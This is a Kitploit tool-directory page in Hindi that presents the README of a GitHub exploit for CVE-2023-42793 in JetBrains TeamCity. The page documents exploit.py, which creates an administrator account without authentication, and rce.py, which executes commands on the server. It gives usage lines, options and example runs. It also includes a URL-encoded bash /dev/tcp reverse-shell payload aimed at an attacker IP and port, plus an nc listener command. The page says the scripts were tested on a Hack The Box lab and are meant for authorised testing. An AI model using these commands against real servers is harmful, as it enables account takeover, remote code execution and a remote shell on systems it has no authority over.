Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-42793 — JetBrains TeamCity 2023.05.3 - रिमोट कोड एक्ज़ीक्यूशन (RCE), CVE-2023-42793 | Kitploit
उपकरण/GitHubGitHub/b4l3ri0n/cve-2023-42793
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubb4l3ri0n/cve-2023-42793

CVE-2023-42793

JetBrains TeamCity 2023.05.3 - रिमोट कोड एक्ज़ीक्यूशन (RCE), CVE-2023-42793

रिपॉजिटरी देखें
1132 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2023-42793 - TeamCity व्यवस्थापक खाता निर्माण से RCE

पहले exploit.py का उपयोग करके आपके लिए एक व्यवस्थापक खाता बनाएं, फिर लक्ष्य पर कमांड निष्पादित करने के लिए rce.py का उपयोग करें, और रिवर्स शेल के लिए यह देखें

एक्सप्लॉइट स्क्रिप्ट

विवरण

यह स्क्रिप्ट CVE-2023-42793 का उपयोग करके TeamCity सर्वर पर एक व्यवस्थापक खाता बनाती है। यह लक्ष्य URL पर एक POST अनुरोध भेजकर निर्दिष्ट या यादृच्छिक क्रेडेंशियल्स के साथ एक व्यवस्थापक उपयोगकर्ता बनाती है।

उपयोग

root@kitploit:~
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]

विकल्प

  • -u, --url URL: लक्ष्य URL (आवश्यक)
  • -v, --verbose: विस्तृत मोड सक्षम करें
  • -n, --username USERNAME: उपयोगकर्ता नाम निर्दिष्ट करें (डिफ़ॉल्ट: यादृच्छिक)
  • -p, --password PASSWORD: पासवर्ड निर्दिष्ट करें (डिफ़ॉल्ट: यादृच्छिक)
  • -e, --email EMAIL: ईमेल निर्दिष्ट करें (डिफ़ॉल्ट: यादृच्छिक)
  • -t, --token-file: टोकन को सहेजने के लिए फ़ाइल

आवश्यक शर्तें

  • Python 3.x
  • Python लाइब्रेरीज़
    • निर्भरताएँ स्थापित करने के लिए pip3 install -r requirements.txt

उदाहरण

  1. यादृच्छिक उपयोगकर्ता नाम, पासवर्ड और ईमेल के साथ एक्सप्लॉइट करें:

    root@kitploit:~
    python exploit.py -u http://target.com
    
  2. निर्दिष्ट उपयोगकर्ता नाम, पासवर्ड और ईमेल के साथ एक्सप्लॉइट करें:

    root@kitploit:~
    python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
    

आउटपुट

सफल एक्सप्लॉइटेशन पर, स्क्रिप्ट बनाए गए व्यवस्थापक खाते का URL, उपयोगकर्ता नाम और पासवर्ड प्रिंट करती है, फिर आउटपुट को टोकन फ़ाइल में सहेजती है।

दूरस्थ कोड निष्पादन (RCE) स्क्रिप्ट

विवरण

यह स्क्रिप्ट CVE-2023-42793 का उपयोग करके एक कमजोर TeamCity सर्वर पर कमांड निष्पादित करने की अनुमति देती है। यह पहले डीबग प्रक्रियाओं को सक्षम करती है और फिर उपयुक्त API एंडपॉइंट्स का उपयोग करके निर्दिष्ट कमांड को निष्पादित करती है।

उपयोग

root@kitploit:~
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]

विकल्प

  • -u, --url URL : लक्ष्य URL (आवश्यक)
  • -t, --token-file : टोकन वाली फ़ाइल निर्दिष्ट करने के लिए
  • -c, --command COMMAND: निष्पादित करने के लिए कमांड निर्दिष्ट करें (RCE)
  • -P, --port PORT: पोर्ट निर्दिष्ट करें (डिफ़ॉल्ट 80 है)

उदाहरण

निर्दिष्ट कमांड के साथ एक्सप्लॉइट करें:

root@kitploit:~
python rce.py -u http://target.com -t token -c "whoami"

रिवर्स शेल के लिए

root@kitploit:~
python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
  • इस कमांड में रिवर्स शेल के लिए {IP} को अपने IP से और {port} को उस पोर्ट से बदलें जिस पर आप सुन रहे हैं
  • nc -nvlp 5555 का उपयोग करके एक लिसनर बनाएं
  • अधिक जानकारी के लिए revshells देखें

नोट्स

  • यह स्क्रिप्ट Runner.htb हैक द बॉक्स पर परीक्षण की गई है
  • यह स्क्रिप्ट केवल शैक्षणिक उद्देश्यों के लिए है।
  • इसका जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर जिनका परीक्षण करने के लिए आप अधिकृत हैं।

क्रेडिट्स

  • Zyad Elsayed
    • GitHub रिपॉजिटरी: Zyad-Elsayed
    • LinkedIn खाता: zyad-abdelbary
  • व्यवस्थापक खाते के लिए मूल एक्सप्लॉइट: ByteHunter (Exploit-DB)

संसाधन

  • CVE-2023-42793 विवरण: CVE कमजोरी का आधिकारिक विवरण।
  • एक्सप्लॉइट डेटाबेस एंट्री: एक्सप्लॉइट डेटाबेस पर मूल एक्सप्लॉइट कोड।
  • TeamCity ब्लॉग: TeamCity में CVE-2023-42793 कमजोरी पर चर्चा करने वाली ब्लॉग पोस्ट।
  • TeamCity दस्तावेज़ीकरण: TeamCity के लिए आधिकारिक दस्तावेज़ीकरण।
टूल डाउनलोड करें